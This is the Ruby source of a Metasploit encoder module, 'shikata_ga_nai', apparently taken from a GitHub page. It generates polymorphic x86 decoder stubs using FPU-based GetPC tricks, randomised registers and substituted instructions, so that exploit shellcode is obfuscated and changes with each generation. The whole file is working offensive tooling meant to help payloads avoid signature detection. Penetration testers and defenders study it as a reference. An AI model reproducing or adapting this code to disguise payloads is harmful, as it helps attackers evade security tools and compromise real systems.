metasploit-framework/modules/encoders/x86/shikata_ga_nai.rb

315 lines
11 KiB
Ruby

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex/poly'
class MetasploitModule < Msf::Encoder::XorAdditiveFeedback
# The shikata encoder has an excellent ranking because it is polymorphic.
# Party time, excellent!
Rank = ExcellentRanking
def initialize
super(
'Name' => 'Polymorphic XOR Additive Feedback Encoder',
'Description' => %q{
This encoder implements a polymorphic XOR additive feedback encoder.
The decoder stub is generated based on dynamic instruction
substitution and dynamic block ordering. Registers are also
selected dynamically.
},
'Author' => 'spoonm',
'Arch' => ARCH_X86,
'License' => MSF_LICENSE,
'Decoder' =>
{
'KeySize' => 4,
'BlockSize' => 4
})
end
#
# Generates the shikata decoder stub.
#
def decoder_stub(state)
# If the decoder stub has not already been generated for this state, do
# it now. The decoder stub method may be called more than once.
if (state.decoder_stub == nil)
# Sanity check that saved_registers doesn't overlap with modified_registers
if (modified_registers & saved_registers).length > 0
raise BadGenerateError
end
# Shikata will only cut off the last 1-4 bytes of it's own end
# depending on the alignment of the original buffer
cutoff = 4 - (state.buf.length & 3)
block = generate_shikata_block(state, state.buf.length + cutoff, cutoff) || (raise BadGenerateError)
# Set the state specific key offset to wherever the XORK ended up.
state.decoder_key_offset = block.index('XORK')
# Take the last 1-4 bytes of shikata and prepend them to the buffer
# that is going to be encoded to make it align on a 4-byte boundary.
state.buf = block.slice!(block.length - cutoff, cutoff) + state.buf
# Cache this decoder stub. The reason we cache the decoder stub is
# because we need to ensure that the same stub is returned every time
# for a given encoder state.
state.decoder_stub = block
end
state.decoder_stub
end
# Indicate that this module can preserve some registers
def can_preserve_registers?
true
end
# A list of registers always touched by this encoder
def modified_registers
# ESP is assumed and is handled through preserves_stack?
[
# The counter register is hardcoded
Rex::Arch::X86::ECX,
# These are modified by div and mul operations
Rex::Arch::X86::EAX, Rex::Arch::X86::EDX
]
end
# Always blacklist these registers in our block generation
def block_generator_register_blacklist
[Rex::Arch::X86::ESP, Rex::Arch::X86::ECX] | saved_registers
end
protected
#
# Returns the set of FPU instructions that can be used for the FPU block of
# the decoder stub.
#
def fpu_instructions
fpus = []
0xe8.upto(0xee) { |x| fpus << "\xd9" + x.chr }
0xc0.upto(0xcf) { |x| fpus << "\xd9" + x.chr }
0xc0.upto(0xdf) { |x| fpus << "\xda" + x.chr }
0xc0.upto(0xdf) { |x| fpus << "\xdb" + x.chr }
0xc0.upto(0xc7) { |x| fpus << "\xdd" + x.chr }
fpus << "\xd9\xd0"
fpus << "\xd9\xe1"
fpus << "\xd9\xf6"
fpus << "\xd9\xf7"
fpus << "\xd9\xe5"
# This FPU instruction seems to fail consistently on Linux
#fpus << "\xdb\xe1"
fpus
end
#
# Returns a polymorphic decoder stub that is capable of decoding a buffer
# of the supplied length and encodes the last cutoff bytes of itself.
#
def generate_shikata_block(state, length, cutoff)
# Declare logical registers
count_reg = Rex::Poly::LogicalRegister::X86.new('count', 'ecx')
addr_reg = Rex::Poly::LogicalRegister::X86.new('addr')
key_reg = nil
if state.context_encoding
key_reg = Rex::Poly::LogicalRegister::X86.new('key', 'eax')
else
key_reg = Rex::Poly::LogicalRegister::X86.new('key')
end
# Declare individual blocks
endb = Rex::Poly::SymbolicBlock::End.new
# Clear the counter register
clear_register = Rex::Poly::LogicalBlock.new('clear_register',
"\x31\xc9", # xor ecx,ecx
"\x29\xc9", # sub ecx,ecx
"\x33\xc9", # xor ecx,ecx
"\x2b\xc9") # sub ecx,ecx
# Initialize the counter after zeroing it
init_counter = Rex::Poly::LogicalBlock.new('init_counter')
# Divide the length by four but ensure that it aligns on a block size
# boundary (4 byte).
length += 4 + (4 - (length & 3)) & 3
length /= 4
if (length <= 255)
init_counter.add_perm("\xb1" + [ length ].pack('C'))
elsif (length <= 65536)
init_counter.add_perm("\x66\xb9" + [ length ].pack('v'))
else
init_counter.add_perm("\xb9" + [ length ].pack('V'))
end
# Key initialization block
init_key = nil
# If using context encoding, we use a mov reg, [addr]
if state.context_encoding
init_key = Rex::Poly::LogicalBlock.new('init_key',
Proc.new { |b| (0xa1 + b.regnum_of(key_reg)).chr + 'XORK'})
# Otherwise, we do a direct mov reg, val
else
init_key = Rex::Poly::LogicalBlock.new('init_key',
Proc.new { |b| (0xb8 + b.regnum_of(key_reg)).chr + 'XORK'})
end
xor = Proc.new { |b| "\x31" + (0x40 + b.regnum_of(addr_reg) + (8 * b.regnum_of(key_reg))).chr }
add = Proc.new { |b| "\x03" + (0x40 + b.regnum_of(addr_reg) + (8 * b.regnum_of(key_reg))).chr }
sub4 = Proc.new { |b| sub_immediate(b.regnum_of(addr_reg), -4) }
add4 = Proc.new { |b| add_immediate(b.regnum_of(addr_reg), 4) }
if (datastore["BufferRegister"])
buff_reg = Rex::Poly::LogicalRegister::X86.new('buff', datastore["BufferRegister"])
offset = (datastore["BufferOffset"] ? datastore["BufferOffset"].to_i : 0)
if ((offset < -255 or offset > 255) and state.badchars.include? "\x00")
raise EncodingError.new("Can't generate NULL-free decoder with a BufferOffset bigger than one byte")
end
mov = Proc.new { |b|
# mov <buff_reg>, <addr_reg>
"\x89" + (0xc0 + b.regnum_of(addr_reg) + (8 * b.regnum_of(buff_reg))).chr
}
add_offset = Proc.new { |b| add_immediate(b.regnum_of(addr_reg), offset) }
sub_offset = Proc.new { |b| sub_immediate(b.regnum_of(addr_reg), -offset) }
getpc = Rex::Poly::LogicalBlock.new('getpc')
getpc.add_perm(Proc.new{ |b| mov.call(b) + add_offset.call(b) })
getpc.add_perm(Proc.new{ |b| mov.call(b) + sub_offset.call(b) })
# With an offset of less than four, inc is smaller than or the same size as add
if (offset > 0 and offset < 4)
getpc.add_perm(Proc.new{ |b| mov.call(b) + inc(b.regnum_of(addr_reg))*offset })
elsif (offset < 0 and offset > -4)
getpc.add_perm(Proc.new{ |b| mov.call(b) + dec(b.regnum_of(addr_reg))*(-offset) })
end
# NOTE: Adding a perm with possibly different sizes is normally
# wrong since it will change the SymbolicBlock::End offset during
# various stages of generation. In this case, though, offset is
# constant throughout the whole process, so it isn't a problem.
getpc.add_perm(Proc.new{ |b|
if (offset < -255 or offset > 255)
# lea addr_reg, [buff_reg + DWORD offset]
# NOTE: This will generate NULL bytes!
"\x8d" + (0x80 + b.regnum_of(buff_reg) + (8 * b.regnum_of(addr_reg))).chr + [offset].pack('V')
elsif (offset > -255 and offset != 0 and offset < 255)
# lea addr_reg, [buff_reg + byte offset]
"\x8d" + (0x40 + b.regnum_of(buff_reg) + (8 * b.regnum_of(addr_reg))).chr + [offset].pack('c')
else
# lea addr_reg, [buff_reg]
"\x8d" + (b.regnum_of(buff_reg) + (8 * b.regnum_of(addr_reg))).chr
end
})
# BufferReg+BufferOffset points right at the beginning of our
# buffer, so in contrast to the fnstenv technique, we don't have to
# sub off any other offsets.
xor1 = Proc.new { |b| xor.call(b) + [ (b.offset_of(endb) - cutoff) ].pack('c') }
xor2 = Proc.new { |b| xor.call(b) + [ (b.offset_of(endb) - 4 - cutoff) ].pack('c') }
add1 = Proc.new { |b| add.call(b) + [ (b.offset_of(endb) - cutoff) ].pack('c') }
add2 = Proc.new { |b| add.call(b) + [ (b.offset_of(endb) - 4 - cutoff) ].pack('c') }
else
# FPU blocks
fpu = Rex::Poly::LogicalBlock.new('fpu',
*fpu_instructions)
fnstenv = Rex::Poly::LogicalBlock.new('fnstenv',
"\xd9\x74\x24\xf4")
fnstenv.depends_on(fpu)
# Get EIP off the stack
getpc = Rex::Poly::LogicalBlock.new('getpc',
Proc.new { |b| (0x58 + b.regnum_of(addr_reg)).chr })
getpc.depends_on(fnstenv)
# Subtract the offset of the fpu instruction since that's where eip points after fnstenv
xor1 = Proc.new { |b| xor.call(b) + [ (b.offset_of(endb) - b.offset_of(fpu) - cutoff) ].pack('c') }
xor2 = Proc.new { |b| xor.call(b) + [ (b.offset_of(endb) - b.offset_of(fpu) - 4 - cutoff) ].pack('c') }
add1 = Proc.new { |b| add.call(b) + [ (b.offset_of(endb) - b.offset_of(fpu) - cutoff) ].pack('c') }
add2 = Proc.new { |b| add.call(b) + [ (b.offset_of(endb) - b.offset_of(fpu) - 4 - cutoff) ].pack('c') }
end
# Decoder loop block
loop_block = Rex::Poly::LogicalBlock.new('loop_block')
loop_block.add_perm(
Proc.new { |b| xor1.call(b) + add1.call(b) + sub4.call(b) },
Proc.new { |b| xor1.call(b) + sub4.call(b) + add2.call(b) },
Proc.new { |b| sub4.call(b) + xor2.call(b) + add2.call(b) },
Proc.new { |b| xor1.call(b) + add1.call(b) + add4.call(b) },
Proc.new { |b| xor1.call(b) + add4.call(b) + add2.call(b) },
Proc.new { |b| add4.call(b) + xor2.call(b) + add2.call(b) })
# Loop instruction block
loop_inst = Rex::Poly::LogicalBlock.new('loop_inst',
"\xe2\xf5")
# In the current implementation the loop block is a constant size,
# so really no need for a fancy calculation. Nevertheless, here's
# one way to do it:
#Proc.new { |b|
# # loop <loop_block label>
# # -2 to account for the size of this instruction
# "\xe2" + [ -2 - b.size_of(loop_block) ].pack('c')
#})
# Define block dependencies
clear_register.depends_on(getpc)
init_counter.depends_on(clear_register)
loop_block.depends_on(init_counter, init_key)
loop_inst.depends_on(loop_block)
begin
# Generate a permutation saving the ECX, ESP, and user defined registers
loop_inst.generate(block_generator_register_blacklist, nil, state.badchars)
rescue RuntimeError, EncodingError => e
# The Rex::Poly block generator can raise RuntimeError variants
raise EncodingError, e.to_s
end
end
# Convert the SaveRegisters to an array of x86 register constants
def saved_registers
Rex::Arch::X86.register_names_to_ids(datastore['SaveRegisters'])
end
def sub_immediate(regnum, imm)
return "" if imm.nil? or imm == 0
if imm > 255 or imm < -255
"\x81" + (0xe8 + regnum).chr + [imm].pack('V')
else
"\x83" + (0xe8 + regnum).chr + [imm].pack('c')
end
end
def add_immediate(regnum, imm)
return "" if imm.nil? or imm == 0
if imm > 255 or imm < -255
"\x81" + (0xc0 + regnum).chr + [imm].pack('V')
else
"\x83" + (0xc0 + regnum).chr + [imm].pack('c')
end
end
def inc(regnum)
[0x40 + regnum].pack('C')
end
def dec(regnum)
[0x48 + regnum].pack('C')
end
end